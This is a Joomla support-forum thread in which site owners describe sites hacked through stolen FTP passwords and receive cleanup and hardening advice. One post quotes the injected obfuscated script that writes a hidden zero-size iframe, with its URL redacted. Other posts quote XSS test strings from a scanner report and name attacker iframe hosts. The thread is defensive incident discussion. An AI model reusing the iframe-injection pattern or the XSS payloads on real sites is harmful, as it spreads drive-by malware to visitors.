Discussion - Malicious Javascript in your site
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Enthusiast
- Posts: 239
- Joined: Sun Apr 30, 2006 11:35 am
- Location: UK
.ftpaccess file
One option my hosting provider offers as an added level of security is the use of a .ftpaccess file which can block ftp access outside of a specified range of ip addresses. This is really helpful if you normally work from the same location as, even if your ftp paswwords have been compromised, a hacker can't gain access to your site if they operate from outside the range of IP addresses that you specify in the .ftpaccess file.
-
- Joomla! Fledgling
- Posts: 3
- Joined: Thu Sep 10, 2009 9:59 am
Re: Malicious Javascript in your site
Thansk @tr1, I'll get in touch with my hosting provider to set this up, if possible.
If anyone wants the php script that I found in the files, PM me...I won't be posting exactly how to corrupt a Joomla site.
If anyone wants the php script that I found in the files, PM me...I won't be posting exactly how to corrupt a Joomla site.
- mandville
- Joomla! Master
- Posts: 15153
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Malicious Javascript in your site
tr1 = tha sounds interesting as normally that can only be done at a vpos root level and not a shared hosting level.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
portable mini golf https://www.putterspalace.co.uk/
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
portable mini golf https://www.putterspalace.co.uk/
-
- Joomla! Fledgling
- Posts: 2
- Joined: Sun Nov 29, 2009 10:52 am
Re: Malicious Javascript in your site
Hi All,
My site was hacked second time and this time i found this script. I have checked the checklist provided in the website.
I have scanned my website acunetix web scanner free edition. i found 72 xss loopholes.
Below is the attack details of the report
The Cookie variable 5cc81001e3583f30bd107e634db40f26 has been set to 1>"><ScRiPt%20%0d%0a>alert(418726250202)%3B</ScRiPt>.
The Cookie variable ytstylefont has been set to 1"+onmouseover=alert(419746258905)+.
Can somebody explain the above report.
i have this script in 145 files and i am cleaning it out.
<script> var x = unescape("[removed encoded URL]");document.write("<i"+"fr"+"am"+"e s"+"r"+"c=""+x+"/ind"+"e"+"x.p"+"hp" w"+"id"+"th="0" he"+"i"+"ght="0" fr"+"a"+"m"+"ebor"+"de"+"r="0"><"+"/ifra"+"m"+"e>"); </script>
I dont know how the hacker managed to put in hundreds of files. Pls give me some suggestions to secure my site. currently i am on shared hosting - does dedicated hosting will solve some of the problems.
Thanks in advance for your help on this.
Cheers,
Designx9
My site was hacked second time and this time i found this script. I have checked the checklist provided in the website.
I have scanned my website acunetix web scanner free edition. i found 72 xss loopholes.
Below is the attack details of the report
The Cookie variable 5cc81001e3583f30bd107e634db40f26 has been set to 1>"><ScRiPt%20%0d%0a>alert(418726250202)%3B</ScRiPt>.
The Cookie variable ytstylefont has been set to 1"+onmouseover=alert(419746258905)+.
Can somebody explain the above report.
i have this script in 145 files and i am cleaning it out.
<script> var x = unescape("[removed encoded URL]");document.write("<i"+"fr"+"am"+"e s"+"r"+"c=""+x+"/ind"+"e"+"x.p"+"hp" w"+"id"+"th="0" he"+"i"+"ght="0" fr"+"a"+"m"+"ebor"+"de"+"r="0"><"+"/ifra"+"m"+"e>"); </script>
I dont know how the hacker managed to put in hundreds of files. Pls give me some suggestions to secure my site. currently i am on shared hosting - does dedicated hosting will solve some of the problems.
Thanks in advance for your help on this.
Cheers,
Designx9
Last edited by ooffick on Mon Nov 30, 2009 10:09 am, edited 1 time in total.
Reason: Mod Note: Removed the code to the Hacker, we don't need to promote the Hacker's website any further.
Reason: Mod Note: Removed the code to the Hacker, we don't need to promote the Hacker's website any further.
-
- Joomla! Guru
- Posts: 522
- Joined: Mon Oct 01, 2007 11:35 am
Re: Malicious Javascript in your site
If you can check your FTP log you will probably find a spike of connections. If so you are hit by a trojan which found the FTP passwords in your computer.
-
- Joomla! Fledgling
- Posts: 2
- Joined: Sun Nov 29, 2009 10:52 am
Re: Malicious Javascript in your site
Hi Evel,
Pls let me know what should i do? I have changed the FTP password. I have cleaned the files but there are some files still there is javascript embeded.
Please advice.
Thanks,
D
Pls let me know what should i do? I have changed the FTP password. I have cleaned the files but there are some files still there is javascript embeded.
Please advice.
Thanks,
D
ewel wrote:If you can check your FTP log you will probably find a spike of connections. If so you are hit by a trojan which found the FTP passwords in your computer.
- mandville
- Joomla! Master
- Posts: 15153
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Malicious Javascript in your site
do a complete overwrite of all files or trash the folders and start againdesignx9 wrote:Hi Evel,
but there are some files still there is javascript embeded.
Please advice.
Thanks,
D
http://docs.joomla.org/Security_Checklist_7 is a good read along with the other security checklists
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
portable mini golf https://www.putterspalace.co.uk/
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
portable mini golf https://www.putterspalace.co.uk/
-
- Joomla! Guru
- Posts: 522
- Joined: Mon Oct 01, 2007 11:35 am
Re: Malicious Javascript in your site
You could follow the following steps to fully clean and repair the website, if a good backup is not available.
I am assuming that no modifications have been made to Joomla core files which cannot be made again using a local computer copy of the modifications that had been made. I am also assuming that only html and php files have been infected - I have no experience with compromised .js files.
First, ensure A) that all local computers with FTP access to the website are free of malware, B) that the website is clean, and C) that the FTP passwords have been changed. Do not visit an infected website, do not save passwords in your FTP client and do not use FTP unless and until those three points are covered.
1. Make a backup copy of configuration.php from the root of your Joomla installation on your server.
2. Find filist.php and upload it, preferably using your cPanel instead of FTP. Then use it to list all files by date to see at which dates your site has been infected and which files have been infected. You could also consult your FTP logs to find the date on which the number of connections peaked.
3. Download a full installation package zip of the latest Joomla version. Open it and remove the installation folder as well as the configuration.php-dist. Then save and close the zip. Upload it to the root of your Joomla installation on your server, preferably using your cPanel instead of FTP. Then extract the zip.
4. Run filist.php again, to see which files with a modification date on the date of infection remain. All of these should be part of third party extensions. For the moment, forget about index.html files. You could open each of the php files with your cPanel code editor to find and remove the malicious tags. It will either be an iframe tag or a script tag, and in the last case it will have visible JavaScript writing an iframe into the page or it will be encoded/obfuscated. However, there is a good chance that part of the file was deleted when the malicious tag was injected. Therefore, it is much better to replace infected files by a clean copy that you upload, preferably using cPanel. You can take a clean copy from a downloaded package of the third party extension of which the infected file is part.
5. Now all you should have left as infected files are index.html files. To clean these manually is a huge job. Since these files will not be seen by anyone unless they try to see the content of a folder on your server through their browser you could decide to leave them. But if you email me I will send you a script I have which makes sure every subfolder has an index.html file.
Good luck!
I am assuming that no modifications have been made to Joomla core files which cannot be made again using a local computer copy of the modifications that had been made. I am also assuming that only html and php files have been infected - I have no experience with compromised .js files.
First, ensure A) that all local computers with FTP access to the website are free of malware, B) that the website is clean, and C) that the FTP passwords have been changed. Do not visit an infected website, do not save passwords in your FTP client and do not use FTP unless and until those three points are covered.
1. Make a backup copy of configuration.php from the root of your Joomla installation on your server.
2. Find filist.php and upload it, preferably using your cPanel instead of FTP. Then use it to list all files by date to see at which dates your site has been infected and which files have been infected. You could also consult your FTP logs to find the date on which the number of connections peaked.
3. Download a full installation package zip of the latest Joomla version. Open it and remove the installation folder as well as the configuration.php-dist. Then save and close the zip. Upload it to the root of your Joomla installation on your server, preferably using your cPanel instead of FTP. Then extract the zip.
4. Run filist.php again, to see which files with a modification date on the date of infection remain. All of these should be part of third party extensions. For the moment, forget about index.html files. You could open each of the php files with your cPanel code editor to find and remove the malicious tags. It will either be an iframe tag or a script tag, and in the last case it will have visible JavaScript writing an iframe into the page or it will be encoded/obfuscated. However, there is a good chance that part of the file was deleted when the malicious tag was injected. Therefore, it is much better to replace infected files by a clean copy that you upload, preferably using cPanel. You can take a clean copy from a downloaded package of the third party extension of which the infected file is part.
5. Now all you should have left as infected files are index.html files. To clean these manually is a huge job. Since these files will not be seen by anyone unless they try to see the content of a folder on your server through their browser you could decide to leave them. But if you email me I will send you a script I have which makes sure every subfolder has an index.html file.
Good luck!
- Prowebdesign
- Joomla! Enthusiast
- Posts: 197
- Joined: Sun Oct 04, 2009 10:37 am
- Contact:
Re: Malicious Javascript in your site
Thanks Leolam - truly helpful. Though i have never yet had to deal with such malicious js code, i will keep in mind your suggestions to keep my site uninfected
Best regards,
Streamline
Web design blog and tutorials http://www.majas-lapu-izstrade.lv
http://www.uniqcube.com
Streamline
Web design blog and tutorials http://www.majas-lapu-izstrade.lv
http://www.uniqcube.com
- carsten888
- Joomla! Ace
- Posts: 1224
- Joined: Sat Feb 11, 2006 8:32 am
- Contact:
Re: Malicious Javascript in your site
I got javascript turning up on a site overnight. Frontend and backend.
In fact, just overnight I get this error:
When I disable ACESEF (extension for sef -urls) the javascript is gone, and the site displays correctly, but obviously all sef-urls do not work. (This is on a live site with 1000's of active users.)
In the admin, the menu bar does not dropdown any more and all, sliding panes are open, because underneath the html-tag is also extra code:
This problem in the admin remains even if ACESEF is disabled. I also disabled all system plugins to see if that would make a difference for the backend. But the problem remains.
I had this a couple of weeks ago, same thing. I reuploaded the index.php and saw weird output. While I was searching for what was going on it was back to normal all of a sudden.
I did a search in dreamweaver for
in my local copy of the site and found nothing. So where could this code come from? It is obviously inserting some script somewhere. Which makes me wonder if the site was hacked.
I am now downloading all files to a separate dir, which I will scan when downloaded.
In fact, just overnight I get this error:
I uploaded my index.php (not downloading a copy to check what was wrong, which would have been a good idea) and the site is back, but the columns are all displayed weird because there is javascript output before the html-tag:Parse error: syntax error, unexpected '<' in /home/stic2808/sitename/www/index.php on line 91
Code: Select all
<script>....</script>
In the admin, the menu bar does not dropdown any more and all, sliding panes are open, because underneath the html-tag is also extra code:
Code: Select all
<script>....</script>
<script>....</script>
I had this a couple of weeks ago, same thing. I reuploaded the index.php and saw weird output. While I was searching for what was going on it was back to normal all of a sudden.
I did a search in dreamweaver for
Code: Select all
try{window.onload
I am now downloading all files to a separate dir, which I will scan when downloaded.
Last edited by ooffick on Sun Dec 20, 2009 3:16 pm, edited 1 time in total.
Reason: Mod Note: Removed the code of the Hacker, we don't need to promote the Hacker's website any further.
Reason: Mod Note: Removed the code of the Hacker, we don't need to promote the Hacker's website any further.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
- carsten888
- Joomla! Ace
- Posts: 1224
- Joined: Sat Feb 11, 2006 8:32 am
- Contact:
Re: Malicious Javascript in your site
update:
I downloaded my entire site and did a code search and found that this code has been inserted in 1868 files in the site. PHP, html, js, also of custom extensions. So the script the hacker is running checks in file type rather then overwrites the known Joomla files.
So yes, this site was hacked.
Fortunately I have the clean files on my local development version.
I read this tread and we are talking mainly about the source of this being ftp-accounts which might have been stolen from infected pc's. Is that the only way anyone has been infected so far? I'm using filezilla on a pretty save pc. Is there any online scan that finds this ugly virus? How do I check if my pc is infected with this specific thing?
I downloaded my entire site and did a code search and found that this code has been inserted in 1868 files in the site. PHP, html, js, also of custom extensions. So the script the hacker is running checks in file type rather then overwrites the known Joomla files.
So yes, this site was hacked.
Fortunately I have the clean files on my local development version.
I read this tread and we are talking mainly about the source of this being ftp-accounts which might have been stolen from infected pc's. Is that the only way anyone has been infected so far? I'm using filezilla on a pretty save pc. Is there any online scan that finds this ugly virus? How do I check if my pc is infected with this specific thing?
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
- carsten888
- Joomla! Ace
- Posts: 1224
- Joined: Sat Feb 11, 2006 8:32 am
- Contact:
Re: Malicious Javascript in your site
It may be worth noting that the ftp-account was also used in the Joomla configuration. So it might be that somehow Joomla's configuration.php was read and the ftp-accounts stolen that way.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
-
- Joomla! Guru
- Posts: 522
- Joined: Mon Oct 01, 2007 11:35 am
Re: Malicious Javascript in your site
As I wrote in an article on my site, these Trojans tend to look for HTML and PHP files, and apparently sometimes also JS files. As far as I know they look for files with one of the following words in the file name: index, default, login, main and home. It seems that only one file per folder is injected with a malicious tag. The tags inserted are iFrames or Javascript - the latter to insert Javascript that will put an iFrame in the page. These tags are usually inserted at the end of a file or immediately after the body tag on the same line. If you have been infected by this sort of Trojan then presumably all this is true on your website.
Unless there is a security hole in Joomla, or your particular setup, that was used to get to your configuration.php I would say your local computer was infected by a Trojan horse. If your configuration.php was read then presumably the hackers going so could have done more and other things than what happened to you, and what happened seems to match the signature of those Trojans. So it seems overwhelmingly more likely that your local computer got injected than that there is a security hole in Joomla. But who knows (not me!), one of your extensions may provide hackers an opening.
Unfortunately you can never be really sure that your local computer is clean. No single anti-virus engine finds all malware, and most of them don't like it if you install several engines. But, apparently Malwarebytes is a fairly safe bet. I have ZoneAlarm which does seem to catch these things. Others reported Kapersky to be good, as well as AVG and Avast. I've also heard that NOD is good.
Unless there is a security hole in Joomla, or your particular setup, that was used to get to your configuration.php I would say your local computer was infected by a Trojan horse. If your configuration.php was read then presumably the hackers going so could have done more and other things than what happened to you, and what happened seems to match the signature of those Trojans. So it seems overwhelmingly more likely that your local computer got injected than that there is a security hole in Joomla. But who knows (not me!), one of your extensions may provide hackers an opening.
Unfortunately you can never be really sure that your local computer is clean. No single anti-virus engine finds all malware, and most of them don't like it if you install several engines. But, apparently Malwarebytes is a fairly safe bet. I have ZoneAlarm which does seem to catch these things. Others reported Kapersky to be good, as well as AVG and Avast. I've also heard that NOD is good.
-
- Joomla! Apprentice
- Posts: 10
- Joined: Wed Nov 18, 2009 9:44 pm
Re: Malicious Javascript in your site
Simple theres your problem, Filezilla altered all my uploaded files and added a link to the bottom of my pages in the same font colour as the background so it took a while before i saw it. Have a look i bet thats your problem.I'm using filezilla on a pretty save pc
- mandville
- Joomla! Master
- Posts: 15153
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Malicious Javascript in your site
please provide proof that it was intentional on the part of FileZilla or edit your post to say you think that they used filezilla to infect your site.fasterstill wrote:Filezilla altered all my uploaded files and added a link to the bottom of my pages in the same font colour as the background so it took a while before i saw it.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
portable mini golf https://www.putterspalace.co.uk/
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
portable mini golf https://www.putterspalace.co.uk/
-
- Joomla! Apprentice
- Posts: 10
- Joined: Wed Nov 18, 2009 9:44 pm
Re: Malicious Javascript in your site
OK how's this. I downloaded a free copy of Filezilla, i belive it was from softpedia. That copy altered files that were uploaded with it and added a link to the bottom of my pages without my permision or knowledge.
- ooffick
- Joomla! Master
- Posts: 11626
- Joined: Thu Jul 17, 2008 3:10 pm
- Location: Ireland
- Contact:
Re: Malicious Javascript in your site
Are you sure the uploaded files were not changed by a virus?fasterstill wrote:OK how's this. I downloaded a free copy of Filezilla, i belive it was from softpedia. That copy altered files that were uploaded with it and added a link to the bottom of my pages without my permision or knowledge.
Did you encrypt the connection to your server via SSL or TLS?
Olaf
Olaf Offick - Global Moderator
learnskills.org
learnskills.org
- brad
- Joomla! Master
- Posts: 13272
- Joined: Fri Aug 12, 2005 12:38 am
- Location: Australia
- Contact:
Re: Malicious Javascript in your site
In my experience, this behaviour is caused by: http://www.iss.net/threats/gumblar.html or one of it's variants. Possibly when you used your FTP client, your ftp login details were logged and then used but the virus/trojan.
Brad Baker
https://xyzuluhosting.com
https://xyzuluhosting.com
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: Malicious Javascript in your site
@carsten888
The free version works fine and people have reported success in finding malware well hidden on their computer that was not otherwise found.
Edit: Be sure you download the latest database updates (update tab) for it after installing and before scanning.
Have you installed and run a full computer scan on your computer with Malwarebytes?Is there any online scan that finds this ugly virus? How do I check if my pc is infected with this specific thing?
The free version works fine and people have reported success in finding malware well hidden on their computer that was not otherwise found.
Edit: Be sure you download the latest database updates (update tab) for it after installing and before scanning.
PhilD
- carsten888
- Joomla! Ace
- Posts: 1224
- Joined: Sat Feb 11, 2006 8:32 am
- Contact:
Re: Malicious Javascript in your site
Yes, did that. Nice program. Did not find anything on my pc. I am sure someone else who had the ftp-account data has been infected.Have you installed and run a full computer scan on your computer with Malwarebytes?
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: Malicious Javascript in your site
Yes it is quite possible that one or more persons who have ftp access have been infected. Until you get a handle on things, I would disable any extra ftp accounts and encourage the others to check their computers.
As a reminder, check out Checklist #7 to use as a guide in fixing things.
As a reminder, check out Checklist #7 to use as a guide in fixing things.
PhilD
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri Jan 15, 2010 7:41 pm
Re: Malicious Javascript in your site
Yes dear i am facing the same problem and my hosting is also same. I just restore it and again hacker goes to my joomla site and edit the files. so then i deleted the accounts i went to the Ubuntu Os and did changes all the things now my site is down with the joomla announcement as site is down for mantainence what to do next? any idea how to over come this problem? they are doing again and again. i do not understand what to do ?gulenzek wrote:I have also some Web sites in Godaddy. During last 15months, my joomla installations -- 1.5.7, 1.5.8 and 1.5.11 -- have been hacked 4 times. The attackers are overwriting index.php, index.html, deafult.php, default_item.php files and adding "eachbul.net/click=" together with a hexadecimal number by assigning to "click" parameter in an iframe tag.
And another incident, the attackers overwriting another address -- yourlotcar.cn:8080/index.php -- in an iframe again. Although my installations 1.5.8 and 1.5.11, I really don't understand how this happens.
I am using CuteFTP 2.0 to access my account and my computers have up-to-date anti-virus softwares.
- carsten888
- Joomla! Ace
- Posts: 1224
- Joined: Sat Feb 11, 2006 8:32 am
- Contact:
Re: Malicious Javascript in your site
- change your ftp-passwordi do not understand what to do ?
- do not just upload the old files over the new files. The site looks repared, but as the hackers had FTP access there could very well be a backdoor somewhere. So you need to REPLACE each directory instead of just overwrite it. To do this in a way so your site does not go down:
1. in your ftp make in your root a directory 'administrator2'. 2. Upload your local version of 'administrator' there. 3. When all is uploaded, change the name of 'administrator' to 'administrator_old' (site might now be crippled) and 4. quickly change the name of 'administrator2' to 'administrator' (site works again). 5. Do that for each directory. 6. make sure there are no extra files anywhere in the root (as well as anywhere in the rest of the site).
You can ask your host if they have a backup to put that back. What they will do most of the time is also, just overwriting the current site with the old site. So if there is a backdoor in the site, it will not get deleted. Letting your host restore your site with an old copy is a lot easyer, but as I discovered, the previous version was hacked as well by a previous attack. So if you do that option, download the entire site and scan it thorowly.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri Jan 15, 2010 7:41 pm
Re: Malicious Javascript in your site
Thanks for the reply also tell me what kind of plugins for security i should install to make my site more secure? its currently down i just install the windows xp service pack 3 and a register anti virius. so now i change the passwords and doing all the things. but i want to know that what to do next? any idea? except the checklist what to do? when i restore my files with the old one it was showing the files so i slect if the file is newer then overwrite so it overwrite them all. so now the site is working fine like my phpbb forum but joomla is not working because when i up the site they got login to my site dont know how. so i remove the users and change the password and select down the site. thats what i did. i will appriciate if u give me more security tips.
regards
rabeel
regards
rabeel
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: Malicious Javascript in your site
You can follow the Security Checklist 7 as well as the rest of the checklists
Some of the most important things is to make sure Joomla and extensions you use are up to date and no extensions you use are not on the VEL
Other things are to use a quality host that cares about security (uses suphp, files 644/directories 755 as default) and to regularly check with several different programs (not just depend on anti-virus) that computers used to access sensitive areas of a site and for ftp are clean of malware.
For replacing core Joomla files you should be using the files contained in a fresh download of the full install package. I.E. overwrite the core files with the freshly downloaded ones. This is outlined in more detail in the checklists. Any extensions/templates should be reinstalled using fresh downloads.
Some of the most important things is to make sure Joomla and extensions you use are up to date and no extensions you use are not on the VEL
Other things are to use a quality host that cares about security (uses suphp, files 644/directories 755 as default) and to regularly check with several different programs (not just depend on anti-virus) that computers used to access sensitive areas of a site and for ftp are clean of malware.
For replacing core Joomla files you should be using the files contained in a fresh download of the full install package. I.E. overwrite the core files with the freshly downloaded ones. This is outlined in more detail in the checklists. Any extensions/templates should be reinstalled using fresh downloads.
PhilD
- leolam
- Joomla! Master
- Posts: 20652
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: Malicious Javascript in your site
Since I cannot edit my own post anymore it seems I need to post this here:
As Ewout also already pointed out as well very clearly many issues are caused by hijacked password from YOUR (!) PC.
I quote " Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account, your homepage's FTP password, online passwords (like website member account), etc. etc. etc. The list is endless. Also, you should use different passwords for each account. Because if you use only one password everywhere and someone gets this password you have a problem... A serious problem. The thief would have access to your e-mail account, homepage, etc. Unimaginable. "
KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).
Strongly consider to install this!
http://keepass.info/
Leo
As Ewout also already pointed out as well very clearly many issues are caused by hijacked password from YOUR (!) PC.
I quote " Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account, your homepage's FTP password, online passwords (like website member account), etc. etc. etc. The list is endless. Also, you should use different passwords for each account. Because if you use only one password everywhere and someone gets this password you have a problem... A serious problem. The thief would have access to your e-mail account, homepage, etc. Unimaginable. "
KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).
Strongly consider to install this!
http://keepass.info/
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- brad
- Joomla! Master
- Posts: 13272
- Joined: Fri Aug 12, 2005 12:38 am
- Location: Australia
- Contact:
Re: Malicious Javascript in your site
Great suggestions Leo.
Everyone: Be sure to also take into account that this kind of FTP activity usually implies your local PC has been compromised in some way. Fixing up your website is just a bandaid, you need to also address your local machine and remove the trojan, which in my experience accounts for everyone of these kinds of compromises I have personally observed.
Everyone: Be sure to also take into account that this kind of FTP activity usually implies your local PC has been compromised in some way. Fixing up your website is just a bandaid, you need to also address your local machine and remove the trojan, which in my experience accounts for everyone of these kinds of compromises I have personally observed.
Brad Baker
https://xyzuluhosting.com
https://xyzuluhosting.com
- leolam
- Joomla! Master
- Posts: 20652
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: Malicious Javascript in your site
@ Brad....Can you insert this in the initial post for me so it does not goes unnoticed?
In case your site is affected a perfect script for cleaning can be obtained via Ewout on http://www.joomlaloft.com/ or your host might be able to run a script to clean your files
But again: Your own PC as stated in the sticky is the cause of most problems as is your host if they do not run suPHP (!)
Leo
In case your site is affected a perfect script for cleaning can be obtained via Ewout on http://www.joomlaloft.com/ or your host might be able to run a script to clean your files
But again: Your own PC as stated in the sticky is the cause of most problems as is your host if they do not run suPHP (!)
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- brad
- Joomla! Master
- Posts: 13272
- Joined: Fri Aug 12, 2005 12:38 am
- Location: Australia
- Contact:
Re: Malicious Javascript in your site
It's not our practise to link to 3rd party sites for issues like this (we do link to JED however) and beside it's a paid script as well.
You can always create a new suggested post, and the moderators can then decide if that thread needs to be stickied or not. I do think this thread is probably already confusing to users, though not your fault of course.
I'll leave it to the quite capable moderators on this section to make the final call though.
You can always create a new suggested post, and the moderators can then decide if that thread needs to be stickied or not. I do think this thread is probably already confusing to users, though not your fault of course.
I'll leave it to the quite capable moderators on this section to make the final call though.
Brad Baker
https://xyzuluhosting.com
https://xyzuluhosting.com
- leolam
- Joomla! Master
- Posts: 20652
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: Malicious Javascript in your site
@ Brad I was pointing at the KeePass part. What is wrong about posting the link to that?
"Meanwhile, however, this week someone asked a copy which I sent for free. Then he asked for a little support, which I gave, again for free. In the end the script made that person very happy so that was exactly what I had been after..."
What hurts this community is the formalistic approach as expressed here again regarding Ewout and his excellent extension. Pity!
What is wrong with paid scripts btw?
Leo
3 hours ago on Alltogether (become a member it is free !) posted by Ewout Wierda the creator of the script:brad wrote:It's not our practise to link to 3rd party sites for issues like this (we do link to JED however) and beside it's a paid script as well.
"Meanwhile, however, this week someone asked a copy which I sent for free. Then he asked for a little support, which I gave, again for free. In the end the script made that person very happy so that was exactly what I had been after..."
What hurts this community is the formalistic approach as expressed here again regarding Ewout and his excellent extension. Pity!
What is wrong with paid scripts btw?
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -